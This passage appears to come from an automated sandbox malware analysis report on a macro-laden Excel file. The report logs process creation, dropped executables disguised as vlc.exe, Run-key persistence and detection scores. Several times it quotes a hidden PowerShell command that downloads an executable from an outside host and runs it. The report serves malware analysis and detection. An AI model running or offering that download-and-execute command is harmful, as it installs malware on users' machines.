                Source: C:\Users\Public\raqfxwuo.exeCode function: 21_2_013B4710
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 25_2_026AC284
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 25_2_026AE640
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 25_2_026AE650
                Source: TcLt4.xlsOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                Source: TcLt4.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\raqfxwuo.exe 8EF317F2278FBE6A533E8F78B932698E986280D2F4A6716AAAAA4DC5692222A8
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 8EF317F2278FBE6A533E8F78B932698E986280D2F4A6716AAAAA4DC5692222A8
                Source: raqfxwuo.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: raqfxwuo.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: raqfxwuo.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vlc.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vlc.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vlc.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TcLt4.xls, type: SAMPLEMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
                Source: raqfxwuo.exe.14.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vlc.exe.18.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.evad.winXLS@17/13@2/2
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_01
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{897673FE-06E2-4EAE-9BE5-F5EF89D5EB93} - OProcSessId.datJump to behavior
                Source: TcLt4.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\Public\raqfxwuo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\raqfxwuo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\raqfxwuo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\raqfxwuo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: TcLt4.xlsVirustotal: Detection: 25%
                Source: TcLt4.xlsReversingLabs: Detection: 51%
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}'
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\Public\raqfxwuo.exe 'C:\Users\Public\raqfxwuo.exe'
                Source: unknownProcess created: C:\Users\Public\raqfxwuo.exe 'C:\Users\Public\raqfxwuo.exe'
                Source: unknownProcess created: C:\Users\Public\raqfxwuo.exe C:\Users\Public\raqfxwuo.exe
                Source: unknownProcess created: C:\Users\Public\raqfxwuo.exe C:\Users\Public\raqfxwuo.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\raqfxwuo.exe 'C:\Users\Public\raqfxwuo.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\raqfxwuo.exe 'C:\Users\Public\raqfxwuo.exe'
                Source: C:\Users\Public\raqfxwuo.exeProcess created: C:\Users\Public\raqfxwuo.exe C:\Users\Public\raqfxwuo.exe
                Source: C:\Users\Public\raqfxwuo.exeProcess created: C:\Users\Public\raqfxwuo.exe C:\Users\Public\raqfxwuo.exe
                Source: C:\Users\Public\raqfxwuo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

                Data Obfuscation:

                barindex
                Suspicious powershell command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}'
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_07CCEBE8 push esp; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_08692900 push 8BFFFFD7h; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_0869247D push B80000A2h; iretd
                Source: C:\Users\Public\raqfxwuo.exeCode function: 18_2_086934BF pushfd ; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_00423C0B push ss; ret
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_00C1B490 pushfd ; mov dword ptr [esp], D804C79Ch
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_06FD2A33 push es; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_06FD29DD push es; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_06FD299B push es; iretd
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_073AEBE8 push esp; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_07C72900 push 8BFFFFD7h; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_07C734BF pushfd ; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 19_2_07C7247D push B80000A2h; iretd
                Source: C:\Users\Public\raqfxwuo.exeCode function: 20_2_0114457C push ss; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 20_2_0114AC77 pushfd ; retf
                Source: C:\Users\Public\raqfxwuo.exeCode function: 20_2_0114CFD1 push esp; iretd
                Source: C:\Users\Public\raqfxwuo.exeCode function: 20_2_01145F28 push ds; retf
                Source: initial sampleStatic PE information: section name: .text entropy: 7.96249614821
                Source: initial sampleStatic PE information: section name: .text entropy: 7.96249614821
                Source: raqfxwuo.exe.14.dr, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: raqfxwuo.exe.14.dr, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: vlc.exe.18.dr, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: vlc.exe.18.dr, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 18.2.raqfxwuo.exe.e40000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 18.2.raqfxwuo.exe.e40000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 18.0.raqfxwuo.exe.e40000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 18.0.raqfxwuo.exe.e40000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 19.0.raqfxwuo.exe.420000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 19.0.raqfxwuo.exe.420000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 19.2.raqfxwuo.exe.420000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 19.2.raqfxwuo.exe.420000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 20.2.raqfxwuo.exe.8a0000.1.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 20.2.raqfxwuo.exe.8a0000.1.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 20.0.raqfxwuo.exe.8a0000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 20.0.raqfxwuo.exe.8a0000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 21.2.raqfxwuo.exe.a90000.1.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 21.2.raqfxwuo.exe.a90000.1.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 21.0.raqfxwuo.exe.a90000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 21.0.raqfxwuo.exe.a90000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 23.0.vlc.exe.b80000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 23.0.vlc.exe.b80000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 25.2.vlc.exe.390000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 25.2.vlc.exe.390000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'
                Source: 25.0.vlc.exe.390000.0.unpack, c2Fo1FUEUu0RWAsNqc/iCBtguA2vUiZwpErbx.csHigh entropy of concatenated method names: '.ctor', 'iCBAtgu2v', 'biZUwpErb', 'zU2qFo1FE', 'Dispose', 'bu0cRWAsN', 'blGCQ2p59jBKi6Eh09', 'RpJlS91oerHo5WgUoj', 'TIaY7n381CVUDcgeVK', 'sGHUJcud3rxknBYegI'
                Source: 25.0.vlc.exe.390000.0.unpack, fq3MQHL5s4kEV6MXwJ/wguCTMihOcuL6dhVxS.csHigh entropy of concatenated method names: 'phVuxSLq3', 'JQHa5s4kE', 'u6MeXwJd3', 'bV72wWdrn', 'XqVjTEeoe', 'aRvfP3EdK', '.ctor', '.cctor', 'LaN6iW2wc6kNZSQa9K', 'Tslsx4RPCSl2jSVmPP'

                Persistence and Installation Behavior:

                barindex
                Creates processes via WMIShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\raqfxwuo.exeJump to dropped file
                Source: C:\Users\Public\raqfxwuo.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\raqfxwuo.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\raqfxwuo.exeJump to dropped file
                Source: C:\Users\Public\raqfxwuo.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLANJump to behavior
                Source: C:\Users\Public\raqfxwuo.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to behavior
                Source: C:\Users\Public\raqfxwuo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior
                Source: C:\Users\Public\raqfxwuo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior
                Source: C:\Users\Public\raqfxwuo.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
